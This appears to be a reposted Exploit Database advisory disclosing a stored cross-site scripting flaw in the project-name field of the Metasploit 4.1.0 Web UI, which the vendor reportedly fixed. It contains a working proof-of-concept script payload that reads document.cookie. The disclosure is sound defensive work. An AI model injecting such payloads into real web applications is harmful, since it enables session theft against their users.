Metasploit Web UI 4.1.0 – Persistent Cross-Site Scripting

• Exploit Database
• 9 阅读

• 作者： Stefan Schurtz
  日期： 2011-10-20
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/18012/

• Advisory:		Metasploit 4.1.0 Web UI stored XSS vulnerability
  Advisory ID: 	SSCHADV2011-033
  Author:		Stefan Schurtz
  Affected Software:	Successfully tested on Metasploit Community Edition
  Vendor URL:	http://metasploit.com/
  Vendor Status: 	informed
  
  ==========================
  Vulnerability Description:
  ==========================
  
  Metasploit 4.1.0 Web UI "project[name]" parameter is prone to a XSS vulnerability
  
  ==================
  Technical Details:
  ==================
  
  Login to Web UI -> Create New Project -> Project name -> '"</script><script>alert(document.cookie)</script>
  
  ========
  Credits:
  ========
  
  Vulnerability found and advisory written by Stefan Schurtz.
  
  ===========
  References:
  ===========
  
  http://metasploit.com/
  http://dev.metasploit.com/redmine/issues/5801
  http://www.rul3z.de/advisories/SSCHADV2011-033.txt
  XSS is fixed in Update 20111020000001